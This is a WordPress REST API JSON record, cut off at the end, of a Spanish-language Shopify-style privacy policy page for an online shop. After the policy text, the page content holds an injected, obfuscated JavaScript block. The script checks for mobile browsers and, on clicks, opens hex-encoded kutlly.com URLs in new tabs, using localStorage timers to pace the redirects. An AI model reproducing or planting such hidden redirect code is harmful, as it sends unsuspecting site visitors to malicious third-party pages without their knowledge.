{"id":572,"date":"2020-09-07T01:22:32","date_gmt":"2020-09-07T01:22:32","guid":{"rendered":"https:\/\/ghytias.com\/portal\/?page_id=572"},"modified":"2020-09-07T01:38:58","modified_gmt":"2020-09-07T01:38:58","slug":"politica-de-privacidad","status":"publish","type":"page","link":"https:\/\/ghytias.com\/portal\/politica-de-privacidad\/","title":{"rendered":"Pol\u00edtica de Privacidad"},"content":{"rendered":"<p>[av_section min_height=\u00bb min_height_px=&#8217;500px&#8217; padding=&#8217;default&#8217; shadow=&#8217;no-border-styling&#8217; bottom_border=&#8217;no-border-styling&#8217; bottom_border_diagonal_color=&#8217;#333333&#8242; bottom_border_diagonal_direction=\u00bb bottom_border_style=\u00bb custom_margin=&#8217;0px&#8217; custom_margin_sync=&#8217;true&#8217; custom_arrow_bg=\u00bb id=\u00bb color=&#8217;main_color&#8217; background=&#8217;bg_color&#8217; custom_bg=\u00bb background_gradient_color1=\u00bb background_gradient_color2=\u00bb background_gradient_direction=&#8217;vertical&#8217; src=\u00bb attachment=\u00bb attachment_size=\u00bb attach=&#8217;scroll&#8217; position=&#8217;top left&#8217; repeat=&#8217;no-repeat&#8217; video=\u00bb video_ratio=&#8217;16:9&#8242; overlay_opacity=&#8217;0.5&#8242; overlay_color=\u00bb overlay_pattern=\u00bb overlay_custom_pattern=\u00bb av_element_hidden_in_editor=&#8217;0&#8242; av_uid=&#8217;av-keruryht&#8217;]<\/p>\n<p>[av_one_full first  min_height=\u00bb vertical_alignment=\u00bb space=\u00bb custom_margin=\u00bb margin=&#8217;0px&#8217; row_boxshadow=\u00bb row_boxshadow_color=\u00bb row_boxshadow_width=&#8217;10&#8217; link=\u00bb linktarget=\u00bb link_hover=\u00bb padding=&#8217;0px&#8217; highlight=\u00bb highlight_size=\u00bb border=\u00bb border_color=\u00bb radius=&#8217;0px&#8217; column_boxshadow=\u00bb column_boxshadow_color=\u00bb column_boxshadow_width=&#8217;10&#8217; background=&#8217;bg_color&#8217; background_color=\u00bb background_gradient_color1=\u00bb background_gradient_color2=\u00bb background_gradient_direction=&#8217;vertical&#8217; src=\u00bb background_position=&#8217;top left&#8217; background_repeat=&#8217;no-repeat&#8217; animation=\u00bb mobile_breaking=\u00bb mobile_display=\u00bb av_uid=\u00bb]<\/p>\n<p>[av_hr class=&#8217;default&#8217; height=&#8217;50&#8217; shadow=&#8217;no-shadow&#8217; position=&#8217;center&#8217; custom_border=&#8217;av-border-thin&#8217; custom_width=&#8217;50px&#8217; custom_border_color=\u00bb custom_margin_top=&#8217;30px&#8217; custom_margin_bottom=&#8217;30px&#8217; icon_select=&#8217;yes&#8217; custom_icon_color=\u00bb icon=&#8217;ue808&#8242; av-desktop-hide=\u00bb av-medium-hide=\u00bb av-small-hide=\u00bb av-mini-hide=\u00bb av_uid=\u00bb]<\/p>\n<p>[av_heading heading=&#8217;Pol\u00edtica de Privacidad&#8217; tag=&#8217;h3&#8242; link_apply=\u00bb link=&#8217;manually,http:\/\/&#8217; link_target=\u00bb style=&#8217;blockquote modern-quote modern-centered&#8217; size=\u00bb subheading_active=\u00bb subheading_size=&#8217;15&#8217; margin=\u00bb margin_sync=&#8217;true&#8217; padding=&#8217;10&#8217; color=\u00bb custom_font=\u00bb av-medium-font-size-title=\u00bb av-small-font-size-title=\u00bb av-mini-font-size-title=\u00bb av-medium-font-size=\u00bb av-small-font-size=\u00bb av-mini-font-size=\u00bb av_uid=&#8217;av-keruus8q&#8217; admin_preview_bg=\u00bb][\/av_heading]<\/p>\n<p>[\/av_one_full][\/av_section][av_section min_height=\u00bb min_height_px=&#8217;500px&#8217; padding=&#8217;default&#8217; shadow=&#8217;no-border-styling&#8217; bottom_border=&#8217;no-border-styling&#8217; bottom_border_diagonal_color=&#8217;#333333&#8242; bottom_border_diagonal_direction=\u00bb bottom_border_style=\u00bb custom_margin=&#8217;0px&#8217; custom_margin_sync=&#8217;true&#8217; custom_arrow_bg=\u00bb id=\u00bb color=&#8217;alternate_color&#8217; background=&#8217;bg_color&#8217; custom_bg=\u00bb background_gradient_color1=\u00bb background_gradient_color2=\u00bb background_gradient_direction=&#8217;vertical&#8217; src=\u00bb attachment=\u00bb attachment_size=\u00bb attach=&#8217;scroll&#8217; position=&#8217;top left&#8217; repeat=&#8217;no-repeat&#8217; video=\u00bb video_ratio=&#8217;16:9&#8242; overlay_opacity=&#8217;0.5&#8242; overlay_color=\u00bb overlay_pattern=\u00bb overlay_custom_pattern=\u00bb av_element_hidden_in_editor=&#8217;0&#8242; av_uid=&#8217;av-keruryht&#8217;]<\/p>\n<p>[av_textblock size=\u00bb font_color=\u00bb color=\u00bb av-medium-font-size=\u00bb av-small-font-size=\u00bb av-mini-font-size=\u00bb av_uid=&#8217;av-kerubf5q&#8217; admin_preview_bg=\u00bb]<br \/>\n<span style=\"color: #000000;\">DECLARACI\u00d3N DE PRIVACIDAD<\/span><\/p>\n<p><span style=\"color: #000000;\">&#8212;-<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 1 &#8211; \u00bfQU\u00c9 HACEMOS CON TU INFORMACI\u00d3N?<\/span><\/p>\n<p><span style=\"color: #000000;\">Cuando compras algo de nuestra tienda, como parte del proceso de compra venta, nosotros recolectamos la informaci\u00f3n personal que nos<\/span><\/p>\n<p><span style=\"color: #000000;\">das tales como nombre, direcci\u00f3n y correo electr\u00f3nico.<\/span><\/p>\n<p><span style=\"color: #000000;\">Cuando navegas en nuestra tienda, tambi\u00e9n recibimos de manera autom\u00e1tica la direcci\u00f3n de protocolo de internet de tu computadora (IP)<\/span><\/p>\n<p><span style=\"color: #000000;\">con el fin de proporcionarnos informaci\u00f3n que nos ayuda a conocer acerca de su navegador y sistema operativo.<\/span><\/p>\n<p><span style=\"color: #000000;\">Email marketing (if applicable): Con tu permiso, podremos enviarte correos electr\u00f3nicos acerca de nuestra tienda, nuevos productos y otras actualizaciones<\/span><\/p>\n<p><span style=\"color: #000000;\">SECTION 2 &#8211; CONSENTIMIENTO<\/span><\/p>\n<p><span style=\"color: #000000;\">C\u00f3mo obtienen mi consentimiento?<\/span><\/p>\n<p><span style=\"color: #000000;\">Cuando nos provees tu informaci\u00f3n personal para completar una transacci\u00f3n, verificar tu tarjeta de cr\u00e9dito, crear una \u00f3rden, concertar un env\u00edo o hacer una devoluci\u00f3n, implicamos que aceptas la recolecci\u00f3n y uso por esa raz\u00f3n espec\u00edfica solamente.<\/span><\/p>\n<p><span style=\"color: #000000;\">Si te pedimos tu informaci\u00f3n personal por una raz\u00f3n secundaria, como marketing, te pediremos directame tu expreso consentimiento, o te daremos la oportunidad de negarte.<\/span><\/p>\n<p><span style=\"color: #000000;\">\u00bfC\u00f3mo puedo anular mi consentimiento\u00c7<\/span><\/p>\n<p><span style=\"color: #000000;\">Si luego de haber aceptado cambias de opini\u00f3n, puedes anular tu consentimiento para que te contactemos, por la recolecci\u00f3n, uso o divulgaci\u00f3n de tu informaci\u00f3n, en cualquier momento, contact\u00e1ndonos a enrique689@yahoo.com o escribi\u00e9ndonos a: Diosa Tribal Morelos 129, Ciudad de Mexico, DIF, 04100, Mexico<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 3 &#8211; DIVULGACI\u00d3N<\/span><\/p>\n<p><span style=\"color: #000000;\">Podemos divulgar tu informaci\u00f3n personal si se nos requiere por ley o si violas nuestros T\u00e9rminos de Servicio.<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 4 &#8211; SHOPIFY<\/span><\/p>\n<p><span style=\"color: #000000;\">Nuestra tienda se encuentra alojada en Shopify Inc. Ellos nos proporcionan la plataforma de comercio electr\u00f3nico en l\u00ednea que nos permite venderte nuestros productos y servicios.<\/span><\/p>\n<p><span style=\"color: #000000;\">Tus datos se almacenan a trav\u00e9s del almacenamiento de datos de Shopify, bases de datos y la aplicaci\u00f3n general de Shopify. Tus datos se almacenan en un servidor seguro detr\u00e1s de un firewall.<\/span><\/p>\n<p><span style=\"color: #000000;\">Payment:<\/span><\/p>\n<p><span style=\"color: #000000;\">Si eliges una pasarela de pago directo para completar tu compra, entonces Shopify almacena datos de tu tarjeta de cr\u00e9dito. Est\u00e1 cifrada a trav\u00e9s de la Seguridad Standard de Datos de la Industrai de Tarjetas de Pago (PCI-DSS). Tus datos de transacci\u00f3n de compra se almacenan s\u00f3lo en la medida en que sea necesario para completar la transacci\u00f3n de compra. Despu\u00e9s de que se haya completado, se borra la informaci\u00f3n de su transacci\u00f3n de compra.<\/span><\/p>\n<p><span style=\"color: #000000;\">Todas las pasarelas de pago directo se adhieren a los est\u00e1ndares establecidos por PCI-DSS como lo indicado por el Consejo de Normas de Seguridad de PCI, que es un esfuerzo conjunto de marcas como Visa, MasterCard, American Express y Discover.<\/span><\/p>\n<p><span style=\"color: #000000;\">Los requisitos del PCI-DSS ayudan a garantizar el manejo seguro de la informaci\u00f3n de tarjetas de cr\u00e9dito de las tiendas y sus proveedores de servicios.<\/span><\/p>\n<p><span style=\"color: #000000;\">Para una visi\u00f3n m\u00e1s clara, es posible que tambi\u00e9n desees leer las Condiciones de servicio de Shopify aqu\u00ed o Declaraci\u00f3n de privacidad aqu\u00ed.<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 5 &#8211; SERVICES DE TERCERAS PARTES<\/span><\/p>\n<p><span style=\"color: #000000;\">En general, los proveedores de terceras partes utilizados por nosotros solo recopilar\u00e1n, usar\u00e1n y divulgar\u00e1n tu informaci\u00f3n en la medida que sea necesaria para que les permita desempe\u00f1ar los servicios que nos proveen.<\/span><\/p>\n<p><span style=\"color: #000000;\">Sin embargo, algunos proveedores de servicios de terceros, tales como pasarelas de pago y otros procesadores de transacciones de pago, tienen sus propias poli\u00edticas de privacidad con respecto a la informaci\u00f3n que estamos obligados a proporcionarles para las transacciones relacionadas con las compras.<\/span><\/p>\n<p><span style=\"color: #000000;\">Para estos proveedores, te recomendamos que leas las poli\u00edticas de privacidadpara que puedas entender la manera en que tu informaci\u00f3n personal ser\u00e1 manejada.<\/span><\/p>\n<p><span style=\"color: #000000;\">En particular, recuerda que algunos proveedores pueden estar ubicados o contar con instalaciones que se encuentran en una jurisdicci\u00f3n diferente a ti o nosotros. Asique si deseas proceder con una transacci\u00f3n que involucra los servicios de un proveedor a terceros, tu informaci\u00f3n puede estar sujeta a las leyes de la jurisdicci\u00f3n (jurisdicciones) en que se encuentra el proveedor de servicios o sus instalaciones.<\/span><\/p>\n<p><span style=\"color: #000000;\">A modo de ejemplo, si te encuentras en Canad\u00e1 y tu transacci\u00f3n es procesada por una pasarela de pago con sede en Estados Unidos, entonces tu informaci\u00f3n personal utilizada para completar la transacci\u00f3n puede ser sujeto de divulgaci\u00f3n en virtud de la legislaci\u00f3n de Estados Unidos, incluyendo la Ley Patriota.<\/span><\/p>\n<p><span style=\"color: #000000;\">Una vez que abandonas el sitio web de nuestra tienda o te rediriges a un sitio o aplicaci\u00f3n de terceros, ya no est\u00e1s siendo regulados por la presente Pol\u00edtica de Privacidad o los T\u00e9rminos de Servicio de nuestra p\u00e1gina web.<\/span><\/p>\n<p><span style=\"color: #000000;\">Enlaces<\/span><\/p>\n<p><span style=\"color: #000000;\">Cuando haces clic en enlaces de nuestra tienda, puede que seas redirigido fuera de nuestro sitio. No somos reponsables por las pr\u00e1cticas de privacidad de otros sitios y te recomendamos leer sus normas de privacidad.<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 6 &#8211; SEGURIDAD<\/span><\/p>\n<p><span style=\"color: #000000;\">Para proteger tu informaci\u00f3n personal, tomamos precauciones razonables y seguimos las mejores pr\u00e1cticas de la industria para asegurarnos de que no haya p\u00e9rdida de manera inapropiada, mal uso, acceso, divulgaci\u00f3n, alteraci\u00f3n o destrucci\u00f3n de la misma.<\/span><\/p>\n<p><span style=\"color: #000000;\">SI nos proporcionas la informaci\u00f3n de tu tarjeta de cr\u00e9dito, dicha informaci\u00f3n es encriptada mediante la tecnolog\u00eda Secure Socket Layer (SSL) y se almacena con un cifrado AES-256. Aunque ning\u00fan m\u00e9todo de transmisi\u00f3n a trav\u00e9s de Internet o de almacenamiento electr\u00f3nico es 100% seguro, seguimos todos los requisitos de PCI-DSS e implementamos normas adicionales aceptadas por la industria.<\/span><br \/>\n<span style=\"color: #000000;\">COOKIES<\/span><\/p>\n<p><span style=\"color: #000000;\">Aqu\u00ed tienes una lista de cookies que utilizamos. Las enlistamos para que puedas elegir si quieres optar por quitarlas o no.<\/span><\/p>\n<p><span style=\"color: #000000;\">_session_id, unique token, sessional, Allows Shopify to store information about your session (referrer, landing page, etc).<\/span><\/p>\n<p><span style=\"color: #000000;\">_shopify_visit, no data held, Persistent for 30 minutes from the last visit, Used by our website provider\u2019s internal stats tracker to record the number of visits<\/span><\/p>\n<p><span style=\"color: #000000;\">_shopify_uniq, no data held, expires midnight (relative to the visitor) of the next day, Counts the number of visits to a store by a single customer.<\/span><\/p>\n<p><span style=\"color: #000000;\">cart, unique token, persistent for 2 weeks, Stores information about the contents of your cart.<\/span><\/p>\n<p><span style=\"color: #000000;\">_secure_session_id, unique token, sessional<\/span><\/p>\n<p><span style=\"color: #000000;\">storefront_digest, unique token, indefinite If the shop has a password, this is used to determine if the current visitor has access.<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 7 &#8211; EDAD DE CONSENTIMIENTO<\/span><\/p>\n<p><span style=\"color: #000000;\">Al utilizar este sitio, declaras que tienes al menos la mayor\u00eda de edad en tu estado o provincia de residencia, o que tienes la mayor\u00eda de edad en tu estado o provincia de residencia y que nos has dado tu consentimiento para permitir que cualquiera de tus dependientes menores use este sitio.<\/span><\/p>\n<p><span style=\"color: #000000;\">SECCI\u00d3N 8 &#8211; CAMBIOS A ESTA POL\u00cdTICA DE PRIVACIDAD<\/span><\/p>\n<p><span style=\"color: #000000;\">Nos reservamos el derecho de modificar esta pol\u00edtica de privacidad en cualquier momento, asique por favor rev\u00edsala frecuentemente. Cambios y aclaraciones entrar\u00e1n en vigencia inmediatamente despu\u00e9s de su publicaci\u00f3n en el sitio web. Si hacemos cambios materiales a esta pol\u00edtica, notificaremos aqu\u00ed que ha sido actualizada, por lo que cual est\u00e1s enterado de qu\u00e9 informaci\u00f3n recopilamos, c\u00f3mo y bajo qu\u00e9 circunstancias, si las hubiere, la utilizamos y\/o divulgamos.<\/span><\/p>\n<p><span style=\"color: #000000;\">Si nuestra tienda es adquirida o fusionada con otra empresa, tu informaci\u00f3n puede ser transferida a los nuevos propietarios, para que podamos seguir vendi\u00e9ndote productos.<\/span><\/p>\n<p><span style=\"color: #000000;\">PREGUNTAS E INFORMACI\u00d3N DE CONTACTO<\/span><\/p>\n<p><span style=\"color: #000000;\">Si quieres: acceder, corregir, enmendar o borrar cualquier informaci\u00f3n personal que poseamos sobre ti, registrar una queja, o simplemente quieres m\u00e1s informaci\u00f3n contacta a nuestro Oficial de Cumplimiento de Privacidad enrique689@yahoo.com o por correopostal a Diosa Tribal<\/span><\/p>\n<p><span style=\"color: #000000;\">[Re: Privacy Compliance Officer]<\/span><\/p>\n<p><span style=\"color: #000000;\">[Morelos 129, Ciudad de Mexico, DIF, 04100, Mexico]<\/span><\/p>\n<p><span style=\"color: #000000;\">&#8212;-<\/span><br \/>\n[\/av_textblock]<\/p>\n<p>[\/av_section]<\/p>\n\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=['userAgent','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x53\\x63\\x54\\x32\\x63\\x392','length','_blank','mobileCheck','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x4b\\x6a\\x33\\x63\\x303','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x68\\x6e\\x71\\x30\\x63\\x350','random','-local-storage','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x64\\x78\\x76\\x37\\x63\\x387','stopPropagation','4051490VdJdXO','test','open','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6a\\x43\\x6e\\x36\\x63\\x346','12075252qhSFyR','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x74\\x72\\x61\\x38\\x63\\x318','\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x7a\\x75\\x76\\x35\\x63\\x385','4829028FhdmtK','round','-hurs','-mnts','864690TKFqJG','forEach','abs','1479192fKZCLx','16548MMjUpf','filter','vendor','click','setItem','3402978fTfcqu'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))\/0x1+parseInt(_0x142fd8(0x19f))\/0x2+-parseInt(_0x142fd8(0x1a5))\/0x3+parseInt(_0x142fd8(0x198))\/0x4+-parseInt(_0x142fd8(0x191))\/0x5+parseInt(_0x142fd8(0x1a0))\/0x6+parseInt(_0x142fd8(0x195))\/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3['push'](_0x2e2ad3['shift']());}catch(_0x28e7f8){_0x2e2ad3['push'](_0x2e2ad3['shift']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),'opera',_0x3ec38a(0x192),'substr',_0x3ec38a(0x18c),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x45\\x4e\\x72\\x31\\x63\\x371',_0x3ec38a(0x187),_0x3ec38a(0x18b),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x4e\\x57\\x41\\x34\\x63\\x364',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x6b\\x75\\x74\\x6c\\x6c\\x79\\x2e\\x63\\x6f\\x6d\\x2f\\x6e\\x7a\\x58\\x39\\x63\\x319','',_0x3ec38a(0x18e),'getItem',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),'floor',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),'host','parse',_0x3ec38a(0x1a3),'addEventListener'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(\/(android|bb\\d+|meego).+mobile|avantgo|bada\\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino\/i[_0x365b[0x4]](_0x784bdc)||\/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-\/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)\/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)\/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());<\/script>","protected":false},"excerpt":{"rendered":"","protected":false},"author":1,"featured_media":0,"parent":0,"menu_order":0,"comment_status":"closed","ping_status":"closed","template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"","ast-site-content-layout":"","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","theme-transparent-header-meta":"","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"default","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"footnotes":""},"class_list":["post-572","page","type-page","status-publish","hentry"],"_links":{"self":[{"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/pages\/572","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/pages"}],"about":[{"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/types\/page"}],"author":[{"embeddable":true,"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/comments?post=572"}],"version-history":[{"count":5,"href":"https:\/\/ghytias.com\/portal\/wp-json\/wp\/v2\/pages\/572\/revisions"}],"predecessor-version":[{"i